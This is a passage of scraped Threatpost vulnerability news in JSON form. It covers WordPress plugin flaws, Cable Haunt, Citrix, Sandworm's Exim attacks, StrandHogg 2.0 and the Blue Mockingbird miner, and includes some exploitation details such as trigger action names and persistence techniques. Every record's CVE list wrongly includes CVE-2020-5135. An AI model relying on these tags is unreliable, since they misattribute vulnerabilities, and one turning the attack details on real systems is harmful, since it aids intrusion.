Advertising plugin for WordPress, a premium plugin with over 8,000 customers, contains a critical remote code-execution vulnerability with the potential to be exploited by unauthenticated attackers.\n\nIn May, Page Builder by SiteOrigin, a WordPress plugin with a million active installs that\u2019s used to build websites via a drag-and-drop function, [was found to harbor](<https://threatpost.com/wordpress-page-builder-bugs-takeover/155659/>) two flaws that could allow full site takeover.\n\nMeanwhile in April, it was revealed that legions of website visitors could be infected with drive-by malware, among other issues, thanks to a [CSRF bug in Real-Time Search and Replace](<https://threatpost.com/wordpress-plugin-bug-100k-websites-compromise/155230/>).\n\n_**Complimentary Threatpost Webinar**__: Want to learn more about Confidential Computing and how it can supercharge your cloud security? This webinar \u201c**[Cloud Security Audit: A Confidential Computing Roundtable](<https://attendee.gotowebinar.com/register/3844090971254297614?source=art>)**\u201d brings top cloud-security experts from Microsoft and __Fortanix together to explore how **Confidential Computing** is a game changer for securing dynamic cloud data and preventing IP exposure. Join us **[Wednesday Aug. 12 at 2 p.m. ET](<https://attendee.gotowebinar.com/register/3844090971254297614?source=art>) **for this** FREE **live webinar with Dr. David Thaler, software architect, Microsoft and Dr Richard Searle, security architect, Fortanix \u2013 both with the Confidential Computing Consortium. **[Register Now](<https://attendee.gotowebinar.com/register/3844090971254297614?source=art>)**._\n", "cvss3": {}, "published": "2020-08-04T18:11:18", "type": "threatpost", "title": "Newsletter WordPress Plugin Opens Door to Site Takeover", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-5135"], "modified": "2020-08-04T18:11:18", "id": "THREATPOST:158524EA6F79769C547CC6A407EF6E78", "href": "https://threatpost.com/newsletter-wordpress-plugin-site-takeover/158025/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-14T22:08:58", "description": "Two high-severity vulnerabilities in Post Grid, a WordPress plugin with more than 60,000 installations, opens the door to site takeovers, according to researchers. To boot, nearly identical bugs are also found in Post Grid\u2019s sister plug-in, Team Showcase, which has 6,000 installations.\n\nThe issues are a cross-site scripting (XSS) flaw as well as a PHP object-injection issue. Both bugs are pending CVE numbers, and both are high-severity, rating 7.5 out of 10 on the CvSS vulnerability rating scale.\n\nPost Grid, true to its name, allows users to display their posts in a grid layout; meanwhile, Team Showcase offers a way to easily highlight an organization\u2019s team members. Both allowed the import of custom layouts, and used nearly identical \u2013 and vulnerable \u2013 functions for doing so, according to Ram Gall, researcher with Wordfence.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe XSS bug would allow an attacker to supply a source parameter pointing to a crafted malicious payload hosted elsewhere. The function would then open the file containing the payload, decode it and create a new page layout based on its contents.\n\n\u201cThe created layout included a custom_scripts section, and an attacker could add malicious JavaScript to the custom_css portion of this section,\u201d explained Gall, [in a posting](<https://www.wordfence.com/blog/2020/10/high-severity-vulnerabilities-in-post-grid-and-team-showcase-plugins/>) on Monday. \u201cThis would then be executed whenever an administrative user edited the layout or a visitor visited a page based on the layout.\u201d\n\nThe upshot is that attackers could use the malicious JavaScript to add a malicious administrator, add a backdoor to plugin or theme files, or steal the administrator\u2019s session information \u2013 all of which are paths to complete takeover of a site.\n\nTriggering an exploit is also somewhat trivial.\n\n\u201cIn both cases, a logged-in attacker with minimal permissions such as subscriber could trigger the functions by sending an AJAX request, with the action set to post_grid_import_xml_layouts for the Post Grid plugin or team_import_xml_layouts for the Team Showcase plugin, with each action triggering a function with the same name,\u201d Gall explained.\n\nThe second issue, the PHP object-injection bug, arises in the import function because it unserialized the payload supplied in the source parameter. An attacker could therefore execute arbitrary code, delete or write files, or perform any number of other actions which could lead to site takeover.\n\nTo trigger the flaw, \u201can attacker could craft a string that would be unserialized into an active PHP object,\u201d Gall explained. \u201cAlthough neither plugin utilized any vulnerable magic methods, if another plugin using a vulnerable magic method was installed, Object injection could be used by an attacker.\u201d\n\nBoth vulnerabilities would typically require the attacker to have an account with at least subscriber level privileges \u2013 but there\u2019s a loophole.\n\n\u201cHowever, sites using a plugin or theme that allowed unauthenticated visitors to execute arbitrary shortcodes would be vulnerable to unauthenticated attackers,\u201d Gall added.\n\nThe plugins\u2019 developer, PickPlugins, has issued patches, so web admins should upgrade as soon as possible. The fixed versions are Post Grid v. 2.0.73 and Team Showcase v. 1.22.16.\n\nThese are the latest in the line of faulty WordPress plugins that have come to light this year. In September, a high-severity flaw in the Email Subscribers & Newsletters plugin by Icegram [was found to affect](<https://threatpost.com/wordpress-plugin-flaw/159172/>) more than 100,000 WordPress websites.\n\n[Earlier in August](<https://threatpost.com/critical-flaws-wordpress-quiz-plugin-site-takeover/158379/>), a plugin that is designed to add quizzes and surveys to WordPress websites patched two critical vulnerabilities. The flaws could be exploited by remote, unauthenticated attackers to launch varying attacks \u2013 including fully taking over vulnerable websites. [Also in August,](<https://threatpost.com/newsletter-wordpress-plugin-site-takeover/158025/>) Newsletter, a WordPress plugin with more than 300,000 installations, was discovered to have a pair of vulnerabilities that could lead to code-execution and even site takeover.\n\nAnd, [researchers in July warned](<https://threatpost.com/critical-rce-flaw-wordpress-plugin-on-70k-sites/157824/>) of a critical vulnerability in a WordPress plugin called Comments \u2013 wpDiscuz, which is installed on more than 70,000 websites. The flaw gave unauthenticated attackers the ability to upload arbitrary files (including PHP files) and ultimately execute remote code on vulnerable website servers.\n\n[**On October 14 at 2 PM ET**](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>)** Get the latest information on the rising threats to retail e-commerce security and how to stop them. **[**Register today**](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>)** for this FREE Threatpost webinar, \u201c**[**Retail Security: Magecart and the Rise of e-Commerce Threats.**](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>)**\u201d Magecart and other threat actors are riding the rising wave of online retail usage and racking up big numbers of consumer victims. Find out how websites can avoid becoming the next compromise as we go into the holiday season. Join us Wednesday, Oct. 14, 2-3 PM ET for this **[**LIVE **](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>)**webinar.**\n", "cvss3": {}, "published": "2020-10-05T21:11:44", "type": "threatpost", "title": "Post Grid WordPress Plugin Flaws Allow Site Takeovers", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-5135"], "modified": "2020-10-05T21:11:44", "id": "THREATPOST:8E52FA6620F4FFE6ED3A412867239F2B", "href": "https://threatpost.com/wordpress-plugin-flaws/159856/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-15T22:28:38", "description": "Users of the Microsoft Outlook for Android app should update their apps to avoid a range of attacks.\n\nThe bug (CVE-2019-1460) would allow an attacker to perform cross-site scripting (XSS) attacks on the affected systems and run scripts in the security context of the current user, according to Microsoft\u2019s [advisory on the bug](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2019-1460#ID0EA>). XSS occurs when malicious parties [inject client-side scripts](<https://www.owasp.org/index.php/Cross-site_Scripting_\\(XSS\\)>) into web pages, which trick the unsuspecting user\u2019s browser into thinking that the script came from a trusted source.\n\nIn this case, the computing giant said that the issue exists in the way Microsoft Outlook for Android software parses specifically crafted email messages \u2013 thus, an attacker could exploit the vulnerability by sending just such an email. Czech firm Cybersecurity Help said in a [posting this week](<https://www.tenforums.com/windows-10-news/144873-cve-2019-1460-outlook-android-spoofing-vulnerability.html#post1774661>) that the problem was an \u201cImproper Neutralization of Input During Web Page Generation\u201d problem that exists due to insufficient sanitization of user-supplied data.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe adversary would need to be authenticated to the same network as the potential victim in order to carry out an attack, Microsoft said.\n\nA [write-up by Symantec](<https://www.symantec.com/security-center/vulnerabilities/writeup/110911?om_rssid=sr-advisories>) said that an attacker can exploit this issue to conduct spoofing attacks, while Cybersecurity Help added that an attacker could \u201csteal potentially sensitive information, change appearance of the web page, perform phishing and drive-by-download attacks.\u201d\n\nUsers should ensure that they have the [latest version of the app](<https://play.google.com/store/apps/details?id=com.microsoft.office.outlook>), and update it manually if they haven\u2019t received an auto-update.\n\nBeyond installing that update, Symantec also noted that mitigation includes running the software as a nonprivileged user with minimal access rights.\n\nResearcher Rafael Pablos was credited with finding the bug, which Microsoft rates as \u201cimportant\u201d in severity. It\u2019s listed as having a 5.6 out of 10 severity rating on the CVSS v.3 vulnerability rating scale.\n\n_**Is MFA enough to protect modern enterprises in the peak era of data breaches? How can you truly secure consumer accounts? Prevent account takeover? Find out: Catch our free, on-demand **_[_**Threatpost webinar**_](<https://attendee.gotowebinar.com/register/3127445778613605890?source=post>)_**, \u201cTrends in Fortune 1000 Breach Exposure\u201d to hear advice from breach expert Chip Witt of SpyCloud. **_[_**Click here to register**_](<https://attendee.gotowebinar.com/register/3127445778613605890?source=post>)_**.**_\n", "cvss3": {}, "published": "2019-11-21T19:15:17", "type": "threatpost", "title": "Microsoft Outlook for Android Bug Opens Door to XSS", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-1460", "CVE-2020-5135"], "modified": "2019-11-21T19:15:17", "id": "THREATPOST:597800CEAF4F4832B357C491661792B5", "href": "https://threatpost.com/microsoft-outlook-android-bug-xss/150528/", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}}, {"lastseen": "2020-10-15T22:26:25", "description": "UPDATED\n\nMultiple cable modems used by ISPs to provide broadband into homes have a critical vulnerability in their underlying reference architecture that would allow an attacker full remote control of the device. The footprint for the affected devices numbers in the hundreds of millions worldwide.\n\nDubbed \u201cCable Haunt\u201d by researchers at Lyrebirds, the bug (CVE-2019-19494) is found in cable modems across multiple vendors, including Arris, COMPAL, Netgear, Sagemcom, Technicolor and others. It originated in reference software written by Broadcom, researchers said, which has been copied by different cable-modem manufacturers and used in the devices\u2019 firmware. The bug essentially allows a buffer overflow, which could enable a remote attacker to execute arbitrary code at the kernel level via JavaScript run in a victim\u2019s browser, according to the [CVE writeup](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19494>).\n\nMore specifically, \u201cthe cable modems are vulnerable to a DNS rebind attack followed by overflowing the registers and executing malicious functionality,\u201d explained the researchers, in a [technical paper](<https://cablehaunt.com/>) on the attack. \u201cThe exploit is possible due to lack of protection against DNS rebind attacks, default credentials and a programming error in the spectrum analyzer.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nLyrebirds researchers said that 200 million modems are potentially affected in Europe alone; they focused their research on European ISPs, many of which are already rolling out updates to fix the flaw. However, many of the same modems are used in North America, so Cable Haunt isn\u2019t restricted by geography. Users can check to see if they\u2019re affected using a [test script](<https://github.com/Lyrebirds/cable-haunt-vulnerability-test>) that the researchers released in tandem with the bug details.\n\nAs far as U.S. ISPs, \u201cwe are rapidly testing all our in-home broadband equipment, determining any vulnerability and the best steps to mitigate, as needed,\u201d a Cox spokesperson told Threatpost.\n\nA Charter spokesperson meanwhile told us that Charter is \u201ccurrently working with each of our vendors to determine if their equipment is vulnerable and when we could expect to see a firmware upgrade.\u201d\n\nComcast, for its part, did not return a request for comment.\n\n## The Attack\n\nIn a [proof-of-concept (PoC) exploit](<https://github.com/Lyrebirds/sagemcom-fast-3890-exploit>), researchers were able to demonstrate a two-step attack: First, they compromised the spectrum analyzer component on board a modem, which resulted in local access. The spectrum analyzer uses a websocket for communication with the graphical frontend displayed in a browser, and a server must verify the relevant request parameters added by the browser. However, \u201cbecause these parameters are never inspected by the cable modem, the websocket will accept requests made by JavaScript running in the browser regardless of origin, thereby allowing attackers to reach the endpoint,\u201d researchers explained.\n\nIn the second step, they show that a DNS rebind attack can be used to gain remote access to the compromised spectrum analyzer. [DNS rebinding](<https://www.tripwire.com/state-of-security/vert/practical-attacks-dns-rebinding/>) is a technique that turns a victim\u2019s browser into a proxy for attacking private networks.\n\n\u201cWithout this DNS rebind attack, the spectrum analyzer would only be exploitable on the local network,\u201d they wrote.\n\nThrough malicious communication with the endpoint, a buffer overflow can be exploited to gain control of the modem.\n\n\u201cThe websocket requests are given as JSON,\u201d the paper explained. \u201cThe parser which interprets this JSON request will copy the input parameters to a buffer, regardless of length, allowing values on the stack to be overwritten. Among these values are saved registers, such as the program counter and return address. With a carefully crafted message the modem can be manipulated to execute arbitrary code specified by a remote attacker.\u201d\n\nIf successfully exploited, the vulnerabilities can give attackers \u201cfull remote control over the entire unit, and all the traffic that flows through it, while being invisible for both the user and ISP,\u201d the researchers explained, adding that attackers could intercept private messages, redirect traffic, add the modems to botnets, replace their firmware and more. They could also direct the modem to ignore remote system updates, which could complicate any patching process.\n\n_**This post was updated at 11:30 a.m. ET on Jan, 14, 2020 to include statements from the top U.S. cable companies.**_\n\n_**Concerned about mobile security? **_[**Check out our free Threatpost webinar,**](<https://attendee.gotowebinar.com/register/7679724086205178371?source=art>) _**Top 8 Best Practices for Mobile App Security**__**, on Jan. 22 at 2 p.m. ET. **_**_Poorly secured apps can lead to malware, data breaches and legal/regulatory trouble. Join our experts to discuss the secrets of building a secure mobile strategy, one app at a time._** [_**Click here to register**_](<https://attendee.gotowebinar.com/register/7679724086205178371?source=art>)_**.**_\n", "cvss3": {}, "published": "2020-01-13T15:37:58", "type": "threatpost", "title": "'Cable Haunt' Bug Plagues Millions of Home Modems", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-19494", "CVE-2020-5135"], "modified": "2020-01-13T15:37:58", "id": "THREATPOST:E54A6B6E04C21B79F588B156DC5704F8", "href": "https://threatpost.com/cable-haunt-remote-code-execution/151756/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-15T22:27:01", "description": "Digital workspace and enterprise networks vendor Citrix has announced a critical vulnerability in the Citrix Application Delivery Controller (ADC) and Citrix Gateway. If exploited, it could allow unauthenticated attackers to gain remote access to a company\u2019s local network and carry out arbitrary code execution.\n\nThe Citrix products (formerly the NetScaler ADC and Gateway) are used for application-aware traffic management and secure remote access, respectively, and are installed in at least 80,000 companies in 158 countries, according to Mikhail Klyuchnikov, a researcher at Positive Technologies. The U.S accounts for about 38 percent of vulnerable organizations.\n\n\u201cThis attack does not require access to any accounts, and therefore can be performed by any external attacker,\u201d he noted in research released on Tuesday. \u201cThis vulnerability allows any unauthorized attacker to not only access published applications, but also attack other resources of the company\u2019s internal network from the Citrix server.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nWhile neither Citrix nor Positive Technologies released technical details on the bug ([CVE-2019-19781](<https://support.citrix.com/article/CTX267027>)), they said it affects all supported versions of the product, and all supported platforms, including Citrix ADC and Citrix Gateway 13.0, Citrix ADC and NetScaler Gateway 12.1, Citrix ADC and NetScaler Gateway 12.0, Citrix ADC and NetScaler Gateway 11.1, and also Citrix NetScaler ADC and NetScaler Gateway 10.5, according to the research.\n\n\u201cCitrix applications are widely used in corporate networks,\u201d said Dmitry Serebryannikov, director of security audit department at Positive Technologies, in a statement. \u201cThis includes their use for providing terminal access of employees to internal company applications from any device via the internet. Considering the high risk brought by the discovered vulnerability, and how widespread Citrix software is in the business community, we recommend information security professionals take immediate steps to mitigate the threat.\u201d\n\nCitrix released a [set of measures](<https://support.citrix.com/article/CTX267679>) to mitigate the vulnerability, including software updates, according to the researchers.\n\nThe vendor [made security news](<https://threatpost.com/citrix-confirms-password-spraying-heist/146641/>) earlier this year when cyberattackers used password-spraying techniques to make off with 6TB of internal documents and other data. The attackers intermittently accessed Citrix\u2019 infrastructure between October 13, 2018 and March 8, the company said, and the crooks \u201cprincipally stole business documents and files from a company shared network drive that has been used to store current and historical business documents, as well as a drive associated with a web-based tool used in our consulting practice.\u201d\n\nPassword-spraying is a related type of attack to brute-forcing and credential-stuffing. Instead of trying a large number of passwords against a single account, in password-spraying the adversary will try a single commonly used password (such as \u201c123456\u201d) against many accounts. If unsuccessful, a second password will be tried, and so on until accounts are cracked. This \u201clow and slow\u201d method is used to avoid account lock-outs stemming from too many failed login attempts.\n\nIn the case of Citrix, which has always specialized in federated architectures, the FBI surmised in March that the attackers likely gained a foothold with limited access, and then worked to circumvent additional layers of security. That was backed up by evidence that the attackers were trying to pivot to other areas of the infrastructure.\n", "cvss3": {}, "published": "2019-12-26T19:17:55", "type": "threatpost", "title": "Critical Citrix Bug Puts 80,000 Corporate LANs at Risk", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-19781", "CVE-2020-5135"], "modified": "2019-12-26T19:17:55", "id": "THREATPOST:9688E067E5F287042D4EBC46107C66AF", "href": "https://threatpost.com/critical-citrix-bug-80000-corporate-lans-at-risk/151444/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-14T22:24:47", "description": "The Russia-linked APT group Sandworm has been spotted exploiting a vulnerability in the internet\u2019s top email server software, according to the National Security Agency (NSA).\n\nThe bug exists in the Exim Mail Transfer Agent (MTA) software, an open-source offering used on Linux and Unix-like systems. It essentially receives, routes and delivers email messages from local users and remote hosts. Exim is the default MTA included on some Linux distros like Debian and Red Hat, and Exim-based mail servers in general run almost 57 percent of the internet\u2019s email servers, according to [a survey last year](<http://www.securityspace.com/s_survey/data/man.201905/mxsurvey.html>).\n\nThe bug ([CVE-2019-10149](<https://threatpost.com/linux-servers-worm-exim-flaw/145698/>)) would allow an unauthenticated remote attacker to execute commands with root privileges on an Exim mail server, allowing the attacker to install programs, modify data and create new accounts. It\u2019s also wormable; a previous campaign spread cryptominers automatically from system to system using a port sniffer. The bug was patched last June.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe NSA this week released a cybersecurity advisory on new exploit activity from Unit 74455 of the GRU Main Center for Special Technologies (GTsST), a division of the Russian military intelligence service, a.k.a. Sandworm, a.k.a. BlackEnergy. The APT [has been linked to](<https://threatpost.com/notpetya-linked-to-industroyer-attack-on-ukraine-energy-grid/138287/>) the Industroyer attack on the Ukrainian power grid as well as the [infamous NotPetya attacks](<https://threatpost.com/maersk-shipping-reports-300m-loss-stemming-from-notpetya-attack/127477/>). According to Kaspersky, the group is part of a nexus of related APTs that also includes a [recently discovered group called Zebrocy](<https://threatpost.com/zebrocy-russian-apt/145328/>).\n\nThe flaw can be exploited using a specially crafted email containing a modified \u201cMAIL FROM\u201d field in a Simple Mail Transfer Protocol (SMTP) message. The APT has been exploiting unpatched Exim servers in this way since at least August, according [the NSA\u2019s advisory](<https://media.defense.gov/2020/May/28/2002306626/-1/-1/0/CSA%20Sandworm%20Actors%20Exploiting%20Vulnerability%20in%20Exim%20Transfer%20Agent%2020200528.pdf>).\n\nOnce Sandworm compromises a target Exim server, it subsequently downloads and executes a shell script from a Sandworm-controlled domain to establish a persistent backdoor that can be used for reconnaissance, spying on mail messages, lateral movement and additional malware implantation.\n\n\u201cThis script would attempt to do the following on the victim machine: Add privileged users; disable network security settings; update SSH configurations to enable additional remote access; and execute an additional script to enable follow-on exploitation,\u201d according to the NSA, which didn\u2019t disclose any details as to the victimology of the latest offensives.\n\nExim admins should update their MTAs to [version 4.93 or newer](<https://exim.org/mirrors.html>) to mitigate the issue, the NSA noted.\n\n\u201cThis emphasizes the need for a good vulnerability management plan,\u201d Lamar Bailey, senior director of security research at Tripwire, said via email. \u201cCVE-2019-10149 has been out almost a year now and has a CVSS score above 9, making it a critical vulnerability. High-scoring vulnerabilities on a production email server are high risk and there should be plans in place to remediate them ASAP.\u201d\n\n**_Concerned about the IoT security challenges businesses face as more connected devices run our enterprises, drive our manufacturing lines, track and deliver healthcare to patients, and more? On _**[**_June 3 at 2 p.m. ET_**](<https://attendee.gotowebinar.com/register/1837650474090338831?source=ART>)**_, join renowned security technologist Bruce Schneier, Armis CISO Curtis Simpson and Threatpost for a FREE webinar, _**[**_Taming the Unmanaged and IoT Device Tsunami_**](<https://attendee.gotowebinar.com/register/1837650474090338831?source=ART>)**_. Get exclusive insights on how to manage this new and growing attack surface. _**[**_Please register here_**](<https://attendee.gotowebinar.com/register/1837650474090338831?source=ART>)**_ for this sponsored webinar._**\n", "cvss3": {}, "published": "2020-05-29T16:34:38", "type": "threatpost", "title": "NSA Warns of Sandworm Backdoor Attacks on Mail Servers", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-10149", "CVE-2020-5135"], "modified": "2020-05-29T16:34:38", "id": "THREATPOST:130EDA07603C228BE562B445904A297A", "href": "https://threatpost.com/nsa-sandworm-spy-attacks-exim-mail-servers/156125/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-14T22:24:43", "description": "A critical privilege-escalation vulnerability affecting Android devices has been found that allows attackers to hijack any app on an infected phone \u2013 potentially exposing private SMS messages and photos, login credentials, GPS movements, phone conversations and more.\n\nThe bug is dubbed the \u201cStrandHogg 2.0\u201d vulnerability (CVE-2020-0096) by the Promon researchers who found it, due to its similarity to the [original StrandHogg bug](<https://threatpost.com/strandhogg-vulnerability-allows-malware-to-pose-as-legitimate-android-apps/150750/>) discovered last year. Like the original, a malicious app installed on a device can hide behind legitimate apps. When a normal app icon is clicked, a malicious overlay is instead executed, which can harvest login credentials for the legitimate app.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nHowever, Version 2.0 allows for a wider range of attacks. The main difference with the new bug is that exploits are carried out through reflection, \u201callowing malicious apps to freely assume the identity of legitimate apps while also remaining completely hidden,\u201d researchers explained, in [a white paper](<https://promon.co/strandhogg-2-0/>) published on Tuesday. The original StrandHogg allowed attacks via the TaskAffinity Android control setting.\n\n\u201cStrandHogg 2.0\u2026has learned how to, with the correct per-app tailored assets, dynamically attack nearly any app on a given device simultaneously at the touch of a button, unlike StrandHogg which can only attack apps one at a time,\u201d according to the research.\n\nAttackers would first inject the original launcher activity of the apps they are targeting with their own attack activity. The task will appear to be the original task belonging to the app; however, the attack activity that has been placed into the task is what the user will actually see when the task is activated.\n\n\u201cAs a result, the next time the app is invoked, for instance, by a user clicking its app icon, the Android OS will evaluate the existing tasks and find the task we created,\u201d according to the white paper. \u201cBecause it looks genuine to the app, it will bring the task we created to the foreground and with it our attack will now be activated.\u201d\n\nThe Promon researchers have published a proof-of-concept video of how an exploit would work:\n\n\u201cMobile apps practically have a target painted on their back. Promon\u2019s recent malware vulnerability discovery dubbed \u201cStrandHogg 2.0\u2033 is the latest example of what dangerous malware could do if exploited in the wild \u2013 possibly exposing Android users\u2019 mobile banking credentials and access one-time-passwords sent via SMS,\u201d said Sam Bakken, senior product marketing manager at OneSpan, via email.\n\nStrandHogg 2.0 attacks are also more difficult to detect, researchers wrote.\n\n\u201cAttackers exploiting StrandHogg have to explicitly and manually enter the apps they are targeting into Android Manifest, with this information then becoming visible within an XML file which contains a declaration of permissions, including what actions can be executed,\u201d they explained. \u201cThis declaration of required code, which can be found within the Google Play store, is not the case when exploiting StrandHogg 2.0.\u201d\n\nAttackers can further hide their activities due to the fact that StrandHogg 2.0 requires root access or external configuration, and code obtained from Google Play will not initially appear suspicious to developers and security teams.\n\nNo attacks have thus been seen in the wild, but researchers theorize that it\u2019s only a matter of time before they appear. Promon said that it expects threat actors to use both the original StrandHogg bug and the new version together, in order to broaden their attack surface: Many of the mitigations that can be executed against StrandHogg do not apply to StrandHogg 2.0 and vice-versa, Promon said.\n\n\u201cWe see StrandHogg 2.0 as StrandHogg\u2019s even more evil twin,\u201d said Tom Lysemose Hansen, CTO at Promon. \u201cAttackers looking to exploit StrandHogg 2.0 will likely already be aware of the original StrandHogg vulnerability and the concern is that, when used together it becomes a powerful attack tool for malicious actors.\u201d\n\nGoogle [has issued a patch](<https://threatpost.com/google-android-rce-bug-full-device-access/155460/>) for Android versions 9, 8.1 and 8, but users on earlier versions (representing 39.2 percent of Android devices, researchers said) will remain vulnerable. StrandHogg 2.0 exploits do not impact devices running Android 10, so users should update their devices to the latest firmware in order to protect themselves from attacks.\n\n\u201cWith a significant proportion of Android users reported to still be running older versions of the OS, a large percentage of the global population is still at risk,\u201d the researchers said.\n\nIn fact, according to data from Google, as of April 2020, 91.8 percent of Android active users worldwide are on version 9.0 or earlier: Pie (2018), Oreo (2017), Nougat (2016), Marshmallow (2015), Lollipop (2014), KitKat (2013), Jellybean (2012) and Ice Cream Sandwich (2011).\n\n**_Concerned about the IoT security challenges businesses face as more connected devices run our enterprises, drive our manufacturing lines, track and deliver healthcare to patients, and more? On _**[**_June 3 at 2 p.m. ET_**](<https://attendee.gotowebinar.com/register/1837650474090338831?source=ART>)**_, join renowned security technologist Bruce Schneier, Armis CISO Curtis Simpson and Threatpost for a FREE webinar, _**[**_Taming the Unmanaged and IoT Device Tsunami_**](<https://attendee.gotowebinar.com/register/1837650474090338831?source=ART>)**_. Get exclusive insights on how to manage this new and growing attack surface. _**[**_Please register here_**](<https://attendee.gotowebinar.com/register/1837650474090338831?source=ART>)**_ for this sponsored webinar._**\n", "cvss3": {}, "published": "2020-05-26T21:03:10", "type": "threatpost", "title": "StrandHogg 2.0 Critical Bug Allows Android App Hijacking", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-0096", "CVE-2020-5135"], "modified": "2020-05-26T21:03:10", "id": "THREATPOST:B18EFE773F83789508C61F27321B9FAA", "href": "https://threatpost.com/strandhogg-2-critical-bug-android-app-hijacking/156058/", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-14T22:25:29", "description": "A Monero cryptocurrency-mining campaign has emerged that exploits a known vulnerability in public-facing web applications built on the ASP.NET open-source web framework.\n\nThe campaign has been dubbed Blue Mockingbird by the analysts at Red Canary that discovered the activity. Research uncovered that the cybercriminal gang is exploiting a deserialization vulnerability, [CVE-2019-18935](<https://nvd.nist.gov/vuln/detail/CVE-2019-18935>), which can allow remote code execution. The bug is found in the Progress Telerik UI front-end offering for ASP.NET AJAX.\n\nAJAX stands for Asynchronous JavaScript and XML; It\u2019s used to add script to a webpage which is executed and processed by the browser. Progress Telerik UI is an overlay for controlling it on ASP.NET implementations.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe vulnerability lies specifically in the RadAsyncUpload function, according to the writeup on the bug in the National Vulnerability Database. This is exploitable when the encryption keys are known (via another exploit or other attack), meaning that any campaign relies on a chaining of exploits.\n\nIn the current attacks, Blue Mockingbird attackers are uncovering unpatched versions of Telerik UI for ASP.NET, deploying the [XMRig Monero-mining payload](<https://threatpost.com/oracle-weblogic-exploit-gandcrab-xmrig/144419/>) in dynamic-link library (DLL) form on Windows systems, then executing it and establishing persistence using multiple techniques. From there, the infection propagates laterally through the network.\n\nThe activity appears to stretch back to December, according to the analysis, and continued through April at least.\n\nXMRig is open-source and can be compiled into custom tooling, according to the analysis. Red Canary has observed three distinct execution paths: Execution with rundll32.exe explicitly calling the DLL export fackaaxv; execution using regsvr32.exe using the /s command-line option; and execution with the payload configured as a Windows Service DLL.\n\n\u201cEach payload comes compiled with a standard list of commonly used Monero-mining domains alongside a Monero wallet address,\u201d explained researchers at Red Canary, in a [Thursday writeup](<https://redcanary.com/blog/blue-mockingbird-cryptominer/>). \u201cSo far, we\u2019ve identified two wallet addresses used by Blue Mockingbird that are in active circulation. Due to the private nature of Monero, we cannot see the balance of these wallets to estimate their success.\u201d\n\nTo establish persistence, Blue Mockingbird actors must first elevate their privileges, which they do using various techniques; for instance, researchers observed them using a JuicyPotato exploit to escalate privileges from an IIS Application Pool Identity virtual account to the NT Authority\\SYSTEM account. In another instance, the Mimikatz tool (the official signed version) was used to access credentials for logon.\n\nArmed with the proper privileges, Blue Mockingbird leveraged multiple persistence techniques, including the use of a COR_PROFILER COM hijack to execute a malicious DLL and restore items removed by defenders, according to Red Canary.\n\n\u201cTo use COR_PROFILER, they used wmic.exe and Windows Registry modifications to set environment variables and specify a DLL payload,\u201d the writeup explained.\n\nBlue Mockingbird likes to move laterally to distribute mining payloads across an enterprise, added researchers. The attackers do this by using their elevated privileges and Remote Desktop Protocol (RDP) to access privileged systems, and then Windows Explorer to then distribute payloads to remote systems.\n\nAlthough Blue Mockingbird has been making noticeable waves, the toolkit is a work in progress.\n\n\u201cIn at least one engagement, we observed Blue Mockingbird seemingly experimenting with different tools to create SOCKS proxies for pivoting,\u201d said the researchers. \u201cThese tools included a fast reverse proxy (FRP), Secure Socket Funneling (SSF) and Venom. In one instance, the adversary also tinkered with PowerShell reverse TCP shells and a reverse shell in DLL form.\u201d\n\nIn terms of preventing the threat, patching web servers, web applications and dependencies of the applications to inhibit initial access is the best bet, according to Red Canary.\n\n**_Inbox security is your best defense against today\u2019s fastest growing security threat \u2013 phishing and Business Email Compromise attacks. _**[**_On May 13 at 2 p.m. ET_**](<https://register.gotowebinar.com/register/5064791868226032141?source=ART>)**_, join Valimail security experts and Threatpost for a FREE webinar, _**[**_5 Proven Strategies to Prevent Email Compromise_**](<https://register.gotowebinar.com/register/5064791868226032141?source=ART>)**_. Get exclusive insights and advanced takeaways on how to lockdown your inbox to fend off the latest phishing and BEC assaults. Please _**[**_register here _**](<https://register.gotowebinar.com/register/5064791868226032141?source=ART>)**_for this sponsored webinar._**\n\n_**Also, don\u2019t miss our latest on-demand webinar from DivvyCloud and Threatpost, **_[_**A Practical Guide to Securing the Cloud in the Face of Crisis**_](<https://attendee.gotowebinar.com/register/4136632530104301068?source=art>)_**, with critical, advanced takeaways on how to avoid cloud disruption and chaos.**_\n", "cvss3": {}, "published": "2020-05-07T21:01:37", "type": "threatpost", "title": "Blue Mockingbird Monero-Mining Campaign Exploits Web Apps", "bulletinFamily": "info", "cvss2": {}, 